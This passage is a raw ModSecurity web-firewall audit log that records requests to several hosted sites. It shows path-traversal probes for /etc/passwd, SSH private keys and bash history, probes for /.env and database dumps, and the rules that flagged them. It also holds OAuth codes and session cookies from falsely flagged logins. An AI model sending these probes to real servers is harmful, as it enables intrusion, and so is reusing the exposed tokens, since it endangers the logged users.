"/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHMWkdutIOpb_kg22hdWgAAABM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753336922260172 441329 (- - -) Stopwatch2: 1753336922260172 441329; combined=5156, p1=618, p2=4247, p3=98, p4=59, p5=134, sr=173, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --460eee61-Z-- --99934569-A-- [24/Jul/2025:09:02:23.762382 +0300] aIHMb1ooLYw4or2LgWILHwAAANI 20.74.83.27 56618 127.0.0.1 7081 --99934569-B-- GET /.env HTTP/1.0 Host: test.kime.agency X-Real-IP: 20.74.83.27 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br --99934569-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 25 Jan 2023 19:33:35 GMT ETag: "328-5f31bb5588323" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --99934569-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.kime.agency"] [uri "/.env"] [unique_id "aIHMb1ooLYw4or2LgWILHwAAANI"] Stopwatch: 1753336943758396 4072 (- - -) Stopwatch2: 1753336943758396 4072; combined=2288, p1=567, p2=1653, p3=0, p4=0, p5=67, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --99934569-Z-- --ba1d0670-A-- [24/Jul/2025:09:04:13.378674 +0300] aIHM3EdutIOpb_kg22hhZQAAABU 212.28.242.186 50054 127.0.0.1 7081 --ba1d0670-B-- GET /administration/index.php?code=4/0AVMBsJj0gEG9xe81TlWQyADE5uYp1wRwinwQcomg6UBt3sT17KiFeIXIQ6q4e5K2sk3Hpg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=3&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=nl4918kp7g1tum1evl3odbki25 --ba1d0670-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --ba1d0670-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHM3EdutIOpb_kg22hhZQAAABU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753337052946154 432721 (- - -) Stopwatch2: 1753337052946154 432721; combined=5233, p1=638, p2=4153, p3=143, p4=61, p5=238, sr=184, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ba1d0670-Z-- --46204b7b-A-- [24/Jul/2025:09:04:32.203610 +0300] aIHM8FooLYw4or2LgWIMrAAAAMI 77.90.153.170 39442 127.0.0.1 7081 --46204b7b-B-- GET /.env HTTP/1.0 Host: raqmix.cloud X-Real-IP: 77.90.153.170 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --46204b7b-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 29 Dec 2024 15:42:45 GMT ETag: "328-62a6a8c186eb7" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --46204b7b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "raqmix.cloud"] [uri "/.env"] [unique_id "aIHM8FooLYw4or2LgWIMrAAAAMI"] Stopwatch: 1753337072198498 5205 (- - -) Stopwatch2: 1753337072198498 5205; combined=2735, p1=620, p2=2009, p3=0, p4=0, p5=106, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --46204b7b-Z-- --f6b4b435-A-- [24/Jul/2025:09:09:09.977054 +0300] aIHOBUdutIOpb_kg22hpLQAAAAc 185.177.72.113 45758 127.0.0.1 7081 --f6b4b435-B-- GET /?asset=../../../../root/.bash_history HTTP/1.0 Host: specto.agency X-Real-IP: 185.177.72.113 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f6b4b435-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close X-Accel-Version: 0.01 X-Accel-Redirect: /internal-nginx-static-location/index.html Content-Length: 0 Content-Type: text/html --f6b4b435-H-- Message: Warning. Matched phrase "root/.bash_history" at ARGS:asset. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||specto.agency|F|2"] [data "Matched Data: root/.bash_history found within ARGS:asset: ../../../../root/.bash_history"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "root/.bash_history" at ARGS:asset. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||specto.agency|F|2"] [data "Matched Data: root/.bash_history found within ARGS:asset: ../../../../root/.bash_history"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "specto.agency"] [uri "/"] [unique_id "aIHOBUdutIOpb_kg22hpLQAAAAc"] Stopwatch: 1753337349971526 5711 (- - -) Stopwatch2: 1753337349971526 5711; combined=3761, p1=659, p2=2942, p3=48, p4=39, p5=73, sr=279, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6b4b435-Z-- --b1f12302-A-- [24/Jul/2025:09:09:15.313191 +0300] aIHOC1ooLYw4or2LgWIQjAAAANY 185.177.72.113 38938 127.0.0.1 7081 --b1f12302-B-- GET /?data=../../../../etc/passwd HTTP/1.0 Host: specto.agency X-Real-IP: 185.177.72.113 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b1f12302-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close X-Accel-Version: 0.01 X-Accel-Redirect: /internal-nginx-static-location/index.html Content-Length: 0 Content-Type: text/html --b1f12302-E-- --b1f12302-H-- Message: Warning. Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||specto.agency|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?data=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "etc/passwd" at ARGS:data. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||specto.agency|F|2"] [data "Matched Data: etc/passwd found within ARGS:data: ../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|specto.agency|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||specto.agency|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?data=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "specto.agency"] [uri "/"] [unique_id "aIHOC1ooLYw4or2LgWIQjAAAANY"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:data. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||specto.agency|F|2"] [data "Matched Data: etc/passwd found within ARGS:data: ../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "specto.agency"] [uri "/"] [unique_id "aIHOC1ooLYw4or2LgWIQjAAAANY"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|specto.agency|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "specto.agency"] [uri "/index.html"] [unique_id "aIHOC1ooLYw4or2LgWIQjAAAANY"] Stopwatch: 1753337355302789 10582 (- - -) Stopwatch2: 1753337355302789 10582; combined=8694, p1=5751, p2=2646, p3=43, p4=35, p5=219, sr=212, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b1f12302-Z-- --292a8909-A-- [24/Jul/2025:09:09:19.994775 +0300] aIHOD0dutIOpb_kg22hpkwAAABE 185.177.72.113 39500 127.0.0.1 7081 --292a8909-B-- GET /..%5c..%5c..%5c..%5c..%5c..%5cvar/log/apache2/access.log HTTP/1.0 Host: specto.agency X-Real-IP: 185.177.72.113 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --292a8909-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 18 Apr 2025 18:03:30 GMT ETag: "328-6331156003af8" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --292a8909-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||specto.agency|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||specto.agency|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "specto.agency"] [uri "/..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\var/log/apache2/access.log"] [unique_id "aIHOD0dutIOpb_kg22hpkwAAABE"] Stopwatch: 1753337359989891 4950 (- - -) Stopwatch2: 1753337359989891 4950; combined=3174, p1=490, p2=2611, p3=0, p4=0, p5=73, sr=149, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --292a8909-Z-- --b9e6ed2e-A-- [24/Jul/2025:09:09:20.191172 +0300] aIHOEEdutIOpb_kg22hplgAAAAU 185.177.72.113 39536 127.0.0.1 7081 --b9e6ed2e-B-- GET /database.sql HTTP/1.0 Host: specto.agency X-Real-IP: 185.177.72.113 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b9e6ed2e-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 18 Apr 2025 18:03:30 GMT ETag: "328-6331156003af8" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --b9e6ed2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||specto.agency|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||specto.agency|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "specto.agency"] [uri "/database.sql"] [unique_id "aIHOEEdutIOpb_kg22hplgAAAAU"] Stopwatch: 1753337360185686 5580 (- - -) Stopwatch2: 1753337360185686 5580; combined=3329, p1=707, p2=2550, p3=0, p4=0, p5=72, sr=257, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9e6ed2e-Z-- --6856db0e-A-- [24/Jul/2025:09:09:20.661800 +0300] aIHOEEdutIOpb_kg22hpmwAAAA8 185.177.72.113 39612 127.0.0.1 7081 --6856db0e-B-- GET /?config=../../../../home/user/.ssh/id_rsa HTTP/1.0 Host: specto.agency X-Real-IP: 185.177.72.113 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6856db0e-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close X-Accel-Version: 0.01 X-Accel-Redirect: /internal-nginx-static-location/index.html Content-Length: 0 Content-Type: text/html --6856db0e-E-- --6856db0e-H-- Message: Warning. Matched phrase ".ssh/id_rsa" at ARGS:config. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||specto.agency|F|2"] [data "Matched Data: .ssh/id_rsa found within ARGS:config: ../../../../home/user/.ssh/id_rsa"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at ARGS:config. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||specto.agency|F|2"] [data "Matched Data: .ssh/id_rsa found within ARGS:config: ../../../../home/user/.ssh/id_rsa"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "specto.agency"] [uri "/"] [unique_id "aIHOEEdutIOpb_kg22hpmwAAAA8"] Stopwatch: 1753337360656850 5017 (- - -) Stopwatch2: 1753337360656850 5017; combined=3321, p1=563, p2=2603, p3=47, p4=38, p5=69, sr=237, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6856db0e-Z-- --2d9c6a03-A-- [24/Jul/2025:09:09:20.725955 +0300] aIHOEEdutIOpb_kg22hpnAAAABc 185.177.72.113 39614 127.0.0.1 7081 --2d9c6a03-B-- GET /?path=../../../../etc/nginx/nginx.conf HTTP/1.0 Host: specto.agency X-Real-IP: 185.177.72.113 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2d9c6a03-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close X-Accel-Version: 0.01 X-Accel-Redirect: /internal-nginx-static-location/index.html Content-Length: 0 Content-Type: text/html --2d9c6a03-E-- --2d9c6a03-H-- Message: Warning. Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||specto.agency|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?path=../../../../etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||specto.agency|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:path: ../../../../etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|specto.agency|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||specto.agency|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?path=../../../../etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "specto.agency"] [uri "/"] [unique_id "aIHOEEdutIOpb_kg22hpnAAAABc"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||specto.agency|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:path: ../../../../etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "specto.agency"] [uri "/"] [unique_id "aIHOEEdutIOpb_kg22hpnAAAABc"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|specto.agency|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "specto.agency"] [uri "/index.html"] [unique_id "aIHOEEdutIOpb_kg22hpnAAAABc"] Stopwatch: 1753337360719727 6291 (- - -) Stopwatch2: 1753337360719727 6291; combined=4086, p1=471, p2=3363, p3=52, p4=38, p5=161, sr=152, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2d9c6a03-Z-- --26d7ef24-A-- [24/Jul/2025:09:10:47.985085 +0300] aIHOZ0dutIOpb_kg22hrBQAAABA 195.112.198.68 39626 127.0.0.1 7081 --26d7ef24-B-- GET /administration/index.php?code=4/0AVMBsJhB0zs2ncRnRor3sTL84pYvV7o9Tqg1OCblJfxTH43f4emGsMrLP8Wyvom_wjtU3w&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=cbm1oakl0f868ouoiisu0ahph4 --26d7ef24-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --26d7ef24-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHOZ0dutIOpb_kg22hrBQAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753337447550882 434416 (- - -) Stopwatch2: 1753337447550882 434416; combined=4723, p1=631, p2=3679, p3=141, p4=133, p5=139, sr=149, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --26d7ef24-Z-- --96b60d27-A-- [24/Jul/2025:09:12:24.563841 +0300] aIHOyEdutIOpb_kg22htsAAAABg 195.112.198.68 38318 127.0.0.1 7081 --96b60d27-B-- GET /administration/index.php?code=4/0AVMBsJjFD3YJCjt-5WVoEbi2nk4qoGkXsNzzHZfFVi3jdLptkTEvd75Uue01yAnClvtlRg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: college.jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: 